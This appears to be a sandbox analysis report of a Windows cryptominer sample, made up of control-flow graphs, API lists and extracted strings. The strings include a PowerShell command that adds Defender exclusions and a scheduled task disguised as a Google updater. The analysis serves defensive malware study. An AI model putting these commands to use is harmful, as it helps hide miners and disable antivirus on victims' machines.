11146->11145 11149 7ff6eb44812d 11148->11149 11150 7ff6eb448148 11148->11150 11155 7ff6eb448530 11149->11155 11166 7ff6eb447580 11150->11166 11156 7ff6eb448545 11155->11156 11228 7ff6eb43eb30 RaiseException 11156->11228 11158 7ff6eb448569 11159 7ff6eb448160 16 API calls 11158->11159 11160 7ff6eb448571 11159->11160 11161 7ff6eb448000 16 API calls 11160->11161 11162 7ff6eb448576 11161->11162 11229 7ff6eb43e910 11162->11229 11165->11145 11169 7ff6eb44759a 11166->11169 11167 7ff6eb447606 11167->11149 11175 7ff6eb448000 11167->11175 11169->11167 11170 7ff6eb44767c 11169->11170 11178 7ff6eb43e620 11169->11178 11181 7ff6eb447900 11169->11181 11186 7ff6eb43e5b0 11169->11186 11189 7ff6eb4478d0 11170->11189 11194 7ff6eb446cb0 11175->11194 11179 7ff6eb43e649 11178->11179 11180 7ff6eb43e62f ReleaseSemaphore 11178->11180 11179->11169 11180->11179 11182 7ff6eb448110 16 API calls 11181->11182 11183 7ff6eb44790e 11182->11183 11184 7ff6eb448530 16 API calls 11183->11184 11185 7ff6eb44792e 11184->11185 11185->11169 11187 7ff6eb43e5d0 WaitForSingleObject 11186->11187 11188 7ff6eb43e5be 11186->11188 11187->11188 11188->11169 11190 7ff6eb448110 16 API calls 11189->11190 11191 7ff6eb4478de 11190->11191 11192 7ff6eb448530 16 API calls 11191->11192 11193 7ff6eb4478fe 11192->11193 11195 7ff6eb446cb6 abort 11194->11195 11198 7ff6eb448160 11195->11198 11200 7ff6eb44816d 11198->11200 11199 7ff6eb446cc3 abort 11200->11199 11201 7ff6eb448000 16 API calls 11200->11201 11202 7ff6eb4481dd 11201->11202 11203 7ff6eb4481f2 11202->11203 11204 7ff6eb448160 16 API calls 11202->11204 11205 7ff6eb448000 16 API calls 11203->11205 11206 7ff6eb44820a 11203->11206 11204->11203 11205->11206 11207 7ff6eb446cb0 16 API calls 11206->11207 11208 7ff6eb448213 11207->11208 11209 7ff6eb448160 16 API calls 11208->11209 11210 7ff6eb448232 11209->11210 11224 7ff6eb446cd0 11210->11224 11225 7ff6eb446cd6 11224->11225 11226 7ff6eb448000 16 API calls 11225->11226 11227 7ff6eb446cdb 11226->11227 11228->11158 11230 7ff6eb43e9fa 11229->11230 11233 7ff6eb43e93a 11229->11233 11230->11145 11231 7ff6eb43e9f0 11231->11230 11232 7ff6eb43eb08 RtlUnwindEx abort 11231->11232 11233->11230 11233->11231 11234 7ff6eb43ea60 11233->11234 11236 7ff6eb43e98b 11233->11236 11234->11230 11235 7ff6eb43e9e4 abort 11234->11235 11238 7ff6eb43eab6 RtlUnwindEx 11234->11238 11235->11231 11236->11230 11236->11235 11237 7ff6eb43e9b3 RaiseException 11236->11237 11237->11235 11238->11235

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 7ff6eb4485e0-7ff6eb4486d0 call 7ff6eb43e3f0 call 7ff6eb43d360 5 7ff6eb4486f6-7ff6eb448705 0->5 6 7ff6eb4486d2-7ff6eb4486f1 call 7ff6eb4314f0 0->6 7 7ff6eb44870b-7ff6eb448777 wcslen 5->7 8 7ff6eb449e0d-7ff6eb449e9d 5->8 6->5 10 7ff6eb448779-7ff6eb44879d call 7ff6eb4314f0 7->10 11 7ff6eb4487a2-7ff6eb4487a9 7->11 15 7ff6eb449eaa-7ff6eb449ec4 call 7ff6eb4331d0 8->15 10->11 13 7ff6eb4487ab-7ff6eb44881d 11->13 14 7ff6eb448825-7ff6eb4488e5 call 7ff6eb4340c1 call 7ff6eb433370 call 7ff6eb433c60 memset 11->14 13->14 27 7ff6eb448917-7ff6eb44892f 14->27 28 7ff6eb4488e7-7ff6eb448912 call 7ff6eb4314f0 14->28 22 7ff6eb449ec9-7ff6eb449ee3 call 7ff6eb4331d0 15->22 31 7ff6eb449ee8-7ff6eb449f44 22->31 29 7ff6eb44897a-7ff6eb4489a7 27->29 30 7ff6eb448931-7ff6eb448972 27->30 28->27 33 7ff6eb4489a9-7ff6eb4489cd call 7ff6eb4314f0 29->33 34 7ff6eb4489d2-7ff6eb4489d9 29->34 30->29 33->34 36 7ff6eb448a1a-7ff6eb448a77 call 7ff6eb432b40 call 7ff6eb432b10 memset 34->36 37 7ff6eb4489db-7ff6eb448a12 34->37 42 7ff6eb448aa9-7ff6eb448ab0 36->42 43 7ff6eb448a79-7ff6eb448aa4 call 7ff6eb4314f0 36->43 37->36 45 7ff6eb448aeb-7ff6eb448b8e call 7ff6eb432b10 memset 42->45 46 7ff6eb448ab2-7ff6eb448ae4 42->46 43->42 49 7ff6eb448bc0-7ff6eb448bc7 45->49 50 7ff6eb448b90-7ff6eb448bbb call 7ff6eb4314f0 45->50 46->45 52 7ff6eb448bcd-7ff6eb448c87 49->52 53 7ff6eb448c8f-7ff6eb448d15 call 7ff6eb432b10 memset 49->53 50->49 52->53 56 7ff6eb448d47-7ff6eb448d5f 53->56 57 7ff6eb448d17-7ff6eb448d42 call 7ff6eb4314f0 53->57 59 7ff6eb448ded-7ff6eb448e27 56->59 60 7ff6eb448d65-7ff6eb448de5 56->60 57->56 61 7ff6eb448e29-7ff6eb448e4d call 7ff6eb4314f0 59->61 62 7ff6eb448e52-7ff6eb448e59 59->62 60->59 61->62 63 7ff6eb448e5b-7ff6eb448eac 62->63 64 7ff6eb448eb4-7ff6eb448f1e call 7ff6eb432b40 call 7ff6eb432b10 memset 62->64 63->64 70 7ff6eb448f50-7ff6eb448f5f 64->70 71 7ff6eb448f20-7ff6eb448f4b call 7ff6eb4314f0 64->71 70->31 73 7ff6eb448f65-7ff6eb448fb1 70->73 71->70 74 7ff6eb448fdc-7ff6eb448fe3 73->74 75 7ff6eb448fb3-7ff6eb448fd7 call 7ff6eb4314f0 73->75 77 7ff6eb449037-7ff6eb449098 call 7ff6eb432b40 call 7ff6eb432b10 memset 74->77 78 7ff6eb448fe5-7ff6eb44902f 74->78 75->74 83 7ff6eb4490ca-7ff6eb4490d1 77->83 84 7ff6eb44909a-7ff6eb4490c5 call 7ff6eb4314f0 77->84 78->77 86 7ff6eb44910c-7ff6eb449175 call 7ff6eb432b10 memset 83->86 87 7ff6eb4490d3-7ff6eb449105 83->87 84->83 90 7ff6eb4491a7-7ff6eb4491ae 86->90 91 7ff6eb449177-7ff6eb4491a2 call 7ff6eb4314f0 86->91 87->86 93 7ff6eb449214-7ff6eb449239 call 7ff6eb432b10 call 7ff6eb431eb0 90->93 94 7ff6eb4491b0-7ff6eb44920c 90->94 91->90 99 7ff6eb44923b-7ff6eb449261 call 7ff6eb4314f0 93->99 100 7ff6eb449266-7ff6eb44926d 93->100 94->93 99->100 102 7ff6eb449296-7ff6eb4492fe 100->102 103 7ff6eb44926f-7ff6eb44928e 100->103 104 7ff6eb449329-7ff6eb449330 102->104 105 7ff6eb449300-7ff6eb449324 call 7ff6eb4314f0 102->105 103->102 107 7ff6eb449336-7ff6eb4493d0 104->107 108 7ff6eb4493d8-7ff6eb44946e call 7ff6eb433020 104->108 105->104 107->108 111 7ff6eb449470-7ff6eb449486 call 7ff6eb434064 108->111 114 7ff6eb449488-7ff6eb4494a0 call 7ff6eb4314f0 111->114 115 7ff6eb4494a5-7ff6eb4494ac 111->115 114->115 117 7ff6eb4494c5-7ff6eb4494d2 _wcsicmp 115->117 118 7ff6eb4494ae-7ff6eb4494c1 115->118 119 7ff6eb4494d8-7ff6eb4494de 117->119 120 7ff6eb449940-7ff6eb449943 call 7ff6eb432a60 117->120 118->117 119->120 121 7ff6eb4494e4-7ff6eb449505 call 7ff6eb433320 119->121 124 7ff6eb449948-7ff6eb44994b 120->124 126 7ff6eb44950b-7ff6eb44950d 121->126 127 7ff6eb449bff-7ff6eb449c2b memcpy 121->127 128 7ff6eb449953-7ff6eb449974 memcpy 124->128 129 7ff6eb449518-7ff6eb449539 memcpy 126->129 130 7ff6eb44950f-7ff6eb449512 126->130 131 7ff6eb449c2d-7ff6eb449c5a memcpy call 7ff6eb4314f0 127->131 132 7ff6eb449c60-7ff6eb449c67 127->132 133 7ff6eb449976-7ff6eb4499a2 memcpy call 7ff6eb4314f0 128->133 134 7ff6eb4499a7-7ff6eb4499ae 128->134 141 7ff6eb44953b-7ff6eb449563 memcpy call 7ff6eb4314f0 129->141 142 7ff6eb449568-7ff6eb44956f 129->142 130->111 130->129 131->132 137 7ff6eb449c6d-7ff6eb449ddb 132->137 138 7ff6eb449de2-7ff6eb449dfa call 7ff6eb433500 132->138 133->134 135 7ff6eb449b18-7ff6eb449b4d call 7ff6eb4329a0 134->135 136 7ff6eb4499b4-7ff6eb449b11 134->136 135->15 152 7ff6eb449b53-7ff6eb449b5d 135->152 136->135 137->138 138->129 154 7ff6eb449e00-7ff6eb449e02 138->154 141->142 145 7ff6eb449684-7ff6eb4496a8 call 7ff6eb4329a0 142->145 146 7ff6eb449575-7ff6eb44967d 142->146 145->128 157 7ff6eb4496ae-7ff6eb4496cf memcpy 145->157 146->145 155 7ff6eb449b94-7ff6eb449b9b 152->155 156 7ff6eb449b5f-7ff6eb449b8f call 7ff6eb4314f0 152->156 154->129 158 7ff6eb449e08 154->158 162 7ff6eb449bda-7ff6eb449bfa call 7ff6eb4329a0 155->162 163 7ff6eb449b9d-7ff6eb449bd3 155->163 156->155 160 7ff6eb449702-7ff6eb449709 157->160 161 7ff6eb4496d1-7ff6eb4496fd memcpy call 7ff6eb4314f0 157->161 158->111 165 7ff6eb44970b-7ff6eb449712 160->165 166 7ff6eb449762-7ff6eb449799 call 7ff6eb4329a0 160->166 161->160 162->111 163->162 168 7ff6eb449718-7ff6eb449738 165->168 166->22 173 7ff6eb44979f-7ff6eb4497f2 166->173 168->168 171 7ff6eb44973a-7ff6eb44975a 168->171 171->166 174 7ff6eb449887-7ff6eb44988e 173->174 175 7ff6eb4497f8-7ff6eb449882 call 7ff6eb4314f0 173->175 177 7ff6eb449917-7ff6eb449932 call 7ff6eb4329a0 174->177 178 7ff6eb449894-7ff6eb449910 174->178 175->174 180 7ff6eb449937 177->180 178->177 180->111
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset$wcslen$_wcsicmp
                                                                                                                                                              • String ID: %S /run /tn "GoogleUpdateTaskMachineQC"$%S <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highe$%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$25.<&$5RK\E$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$\BaseNamedObjects\exwrdtlzvhyfkapm$\BaseNamedObjects\yrzibjnsmy$\BaseNamedObjects\yrzibjnsmy$\Google\Chrome\updater.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$xmr
                                                                                                                                                              • API String ID: 116495249-668570170
                                                                                                                                                              • Opcode ID: d10c5496db45c1aa93caa4f9fb91530e0631acdbeb1534beb7e2e9b31a6e44d7
                                                                                                                                                              • Instruction ID: a1ae77acb59942288ada64b25c6e6279120db278c597a0918c5c82e9b89eb6c4
                                                                                                                                                              • Opcode Fuzzy Hash: d10c5496db45c1aa93caa4f9fb91530e0631acdbeb1534beb7e2e9b31a6e44d7
                                                                                                                                                              • Instruction Fuzzy Hash: 17E27F23D1DED6D4F7125B29B8423F467A0AF9A380F045231D98C9667EDF2EA15D830E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 235 7ff6eb431180-7ff6eb4311ae 236 7ff6eb431450-7ff6eb431453 GetStartupInfoA 235->236 237 7ff6eb4311b4-7ff6eb4311d1 235->237 241 7ff6eb431460-7ff6eb43147a call 7ff6eb446610 236->241 238 7ff6eb4311e4-7ff6eb4311ef 237->238 239 7ff6eb4311f1-7ff6eb4311ff 238->239 240 7ff6eb4311d3-7ff6eb4311d6 238->240 244 7ff6eb431407-7ff6eb431416 call 7ff6eb446608 239->244 245 7ff6eb431205-7ff6eb431209 239->245 242 7ff6eb4311dc-7ff6eb4311e1 Sleep 240->242 243 7ff6eb4313f0-7ff6eb431401 240->243 242->238 243->244 243->245 252 7ff6eb43141c-7ff6eb431437 _initterm 244->252 253 7ff6eb431224-7ff6eb431226 244->253 248 7ff6eb431480-7ff6eb431499 call 7ff6eb446620 245->248 249 7ff6eb43120f-7ff6eb43121e 245->249 261 7ff6eb43149e-7ff6eb4314a6 call 7ff6eb446650 248->261 249->252 249->253 255 7ff6eb43122c-7ff6eb431239 252->255 256 7ff6eb43143d-7ff6eb431442 252->256 253->255 253->256 258 7ff6eb431247-7ff6eb43128f call 7ff6eb43d7d0 SetUnhandledExceptionFilter call 7ff6eb446090 call 7ff6eb43d550 call 7ff6eb446070 255->258 259 7ff6eb43123b-7ff6eb431243 255->259 256->255 271 7ff6eb431291 258->271 272 7ff6eb4312a5-7ff6eb4312ab 258->272 259->258 273 7ff6eb4312e7-7ff6eb4312ed 271->273 274 7ff6eb4312ad-7ff6eb4312bb 272->274 275 7ff6eb431293-7ff6eb431295 272->275 279 7ff6eb4313d0-7ff6eb4313da 273->279 280 7ff6eb4312f3-7ff6eb431318 malloc 273->280 278 7ff6eb4312a1 274->278 276 7ff6eb431297-7ff6eb43129a 275->276 277 7ff6eb4312c0-7ff6eb4312c2 275->277 276->277 283 7ff6eb43129c 276->283 284 7ff6eb4312c4 277->284 285 7ff6eb4312d5-7ff6eb4312de 277->285 278->272 286 7ff6eb4313dc 279->286 287 7ff6eb4313e1-7ff6eb4313e7 279->287 281 7ff6eb43135c-7ff6eb431390 call 7ff6eb43d360 call 7ff6eb4485e0 280->281 282 7ff6eb43131a-7ff6eb431320 280->282 296 7ff6eb431395-7ff6eb4313a3 281->296 288 7ff6eb431325-7ff6eb431355 strlen malloc memcpy 282->288 283->278 290 7ff6eb4312e0 284->290 285->290 291 7ff6eb4312d0-7ff6eb4312d3 285->291 286->287 287->280 292 7ff6eb431357 288->292 293 7ff6eb431322 288->293 290->273 291->285 291->290 292->281 293->288 296->261 297 7ff6eb4313a9-7ff6eb4313b1 296->297 297->241 298 7ff6eb4313b7-7ff6eb4313c6 297->298
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 649803965-0
                                                                                                                                                              • Opcode ID: f20fd020c42d19746c786ff100fbdef0b27d4e2ffdb2d0f4d7812018ae33bdc0
                                                                                                                                                              • Instruction ID: 3faa9ca20aadd2ce1e99303d6c2ec08bf65a76222a7cd93cbdaf61f0891cbc5b
                                                                                                                                                              • Opcode Fuzzy Hash: f20fd020c42d19746c786ff100fbdef0b27d4e2ffdb2d0f4d7812018ae33bdc0
                                                                                                                                                              • Instruction Fuzzy Hash: E7817D77E09A06C5FA519F55E48477923A1AF0DB84F484035C90DC73B9DE3EE409870E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 181 7ff6eb431730-7ff6eb4317a6 182 7ff6eb4317e5-7ff6eb4317f7 call 7ff6eb4340d9 181->182 185 7ff6eb4317f9-7ff6eb4317fb 182->185 186 7ff6eb4317b0-7ff6eb4317dd call 7ff6eb43403d 182->186 188 7ff6eb431e40-7ff6eb431e4d 185->188 189 7ff6eb431801-7ff6eb431834 185->189 186->182 192 7ff6eb431e60-7ff6eb431e80 wcslen 188->192 191 7ff6eb431860-7ff6eb43186e 189->191 193 7ff6eb431840-7ff6eb431845 191->193 194 7ff6eb431870-7ff6eb431877 191->194 202 7ff6eb431e90 192->202 197 7ff6eb43184b-7ff6eb43185a 193->197 198 7ff6eb4319a0-7ff6eb4319c1 call 7ff6eb434058 193->198 195 7ff6eb431879-7ff6eb4318b1 call 7ff6eb4314f0 194->195 196 7ff6eb4318b6-7ff6eb4318bd 194->196 195->196 200 7ff6eb43191c-7ff6eb431934 wcsncmp 196->200 201 7ff6eb4318bf-7ff6eb431914 196->201 197->191 197->198 198->202 207 7ff6eb4319c7-7ff6eb431a2a call 7ff6eb43408b call 7ff6eb433c60 memset 198->207 200->193 204 7ff6eb43193a-7ff6eb431998 call 7ff6eb434070 200->204 201->200 204->193 210 7ff6eb43199e 204->210 214 7ff6eb431a2c-7ff6eb431a5c call 7ff6eb4314f0 207->214 215 7ff6eb431a61-7ff6eb431a68 207->215 210->198 214->215 217 7ff6eb431a6a-7ff6eb431aa7 215->217 218 7ff6eb431aaf-7ff6eb431adc wcscpy wcscat wcslen 215->218 217->218 219 7ff6eb431e18-7ff6eb431e2a 218->219 220 7ff6eb431ae2-7ff6eb431b00 wcslen 218->220 221 7ff6eb431b06-7ff6eb431b12 wcslen 219->221 222 7ff6eb431e30-7ff6eb431e3b 219->222 220->221 220->222 223 7ff6eb431b17-7ff6eb431b38 221->223 222->223 223->192 224 7ff6eb431b3e-7ff6eb431e10 wcslen * 2 call 7ff6eb43403d * 2 call 7ff6eb43407f call 7ff6eb434058 * 2 223->224
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcsncmp
                                                                                                                                                              • String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$X$\??\$`$explorer.exe$xmr
                                                                                                                                                              • API String ID: 1181335886-1782556084
                                                                                                                                                              • Opcode ID: 3ad14a35a6e16667e81849032a969dc87def6bacacc2f222a86b2b443e6ab329
                                                                                                                                                              • Instruction ID: 1aa896f402316554b381ed959e814dde02d4ac61d1bdc63b449073c3e9f68093
                                                                                                                                                              • Opcode Fuzzy Hash: 3ad14a35a6e16667e81849032a969dc87def6bacacc2f222a86b2b443e6ab329
                                                                                                                                                              • Instruction Fuzzy Hash: D7028163A08BC5C1E7218B25E4043AA7364FB897A4F044335DAAC976F9DF7ED189C709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • eth, xrefs: 00007FF6EB4329A8
                                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC, xrefs: 00007FF6EB4329A7
                                                                                                                                                              • \BaseNamedObjects\exwrdtlzvhyfkapm, xrefs: 00007FF6EB4329A0
                                                                                                                                                              • %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB4329AA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcsncmp
                                                                                                                                                              • String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$\BaseNamedObjects\exwrdtlzvhyfkapm$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$eth
                                                                                                                                                              • API String ID: 1181335886-2299294724
                                                                                                                                                              • Opcode ID: 28dea6677d6af6e9e95845f5514427c3b51d91342b07da60c88b8e210e45b96c
                                                                                                                                                              • Instruction ID: 1c26f5b83bae4ab0d282087d8ee202659e0c8bd52fd834ca37433a97c033e569
                                                                                                                                                              • Opcode Fuzzy Hash: 28dea6677d6af6e9e95845f5514427c3b51d91342b07da60c88b8e210e45b96c
                                                                                                                                                              • Instruction Fuzzy Hash: 0001CC6371C641C1E220E656B8047EA6661ABCA7D0F584235FECD43BE9CE7DD14AC709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcslen
                                                                                                                                                              • String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0
                                                                                                                                                              • API String ID: 4088430540-185994389
                                                                                                                                                              • Opcode ID: e795708a5df462652d0551e73006b2b1453d33a804765f62acec034eb067b61c
                                                                                                                                                              • Instruction ID: cad8e45054dc8db055259cceae3b5e6d0d802bc4690e674bbd81872a8b834bca
                                                                                                                                                              • Opcode Fuzzy Hash: e795708a5df462652d0551e73006b2b1453d33a804765f62acec034eb067b61c
                                                                                                                                                              • Instruction Fuzzy Hash: AF010022618680C2E7109B50F84479AB730EF88368F680321FA9C46AA9DF7EC4858B40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 648 7ff6eb43db93-7ff6eb43dbbb 649 7ff6eb43dbc1-7ff6eb43dbc6 648->649 650 7ff6eb43dd10-7ff6eb43dd14 648->650 652 7ff6eb43dbc8-7ff6eb43dbcd 649->652 653 7ff6eb43dc23-7ff6eb43dc28 649->653 650->649 651 7ff6eb43dd1a 650->651 654 7ff6eb43dc70 651->654 657 7ff6eb43dbcf-7ff6eb43dbd4 652->657 658 7ff6eb43dc42-7ff6eb43dc52 signal 652->658 655 7ff6eb43dc2e 653->655 656 7ff6eb43dce5-7ff6eb43dcf5 call 7ff6eb4466b8 653->656 660 7ff6eb43dc75-7ff6eb43dc7a 654->660 661 7ff6eb43dc80-7ff6eb43dc85 655->661 662 7ff6eb43dc30-7ff6eb43dc35 655->662 664 7ff6eb43dcf7-7ff6eb43dcfa 656->664 674 7ff6eb43dd30-7ff6eb43dd44 signal 656->674 657->654 659 7ff6eb43dbda 657->659 663 7ff6eb43dc58-7ff6eb43dc6c signal call 7ff6eb43d550 658->663 658->664 667 7ff6eb43dcc0-7ff6eb43dcc5 659->667 668 7ff6eb43dbe0-7ff6eb43dbe5 659->668 661->654 671 7ff6eb43dc87-7ff6eb43dc8c 661->671 662->654 672 7ff6eb43dc37-7ff6eb43dc3c 662->672 663->654 669 7ff6eb43dcfc-7ff6eb43dd08 664->669 670 7ff6eb43dcce-7ff6eb43dcd8 664->670 676 7ff6eb43dc8e-7ff6eb43dc9e signal 667->676 677 7ff6eb43dcc7-7ff6eb43dccc 667->677 668->654 675 7ff6eb43dbeb-7ff6eb43dbf0 668->675 669->660 678 7ff6eb43dcda-7ff6eb43dce1 670->678 679 7ff6eb43dd20-7ff6eb43dd27 670->679 671->670 671->676 672->658 672->670 674->660 675->670 681 7ff6eb43dbf6-7ff6eb43dc06 signal 675->681 683 7ff6eb43dd49-7ff6eb43dd5b signal 676->683 684 7ff6eb43dca4-7ff6eb43dca7 676->684 677->654 677->670 678->656 685 7ff6eb43dc0c-7ff6eb43dc0f 681->685 686 7ff6eb43dd60-7ff6eb43dd72 signal 681->686 683->660 684->670 687 7ff6eb43dca9-7ff6eb43dcb5 684->687 685->670 688 7ff6eb43dc15-7ff6eb43dc21 685->688 686->660 687->660 688->660
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
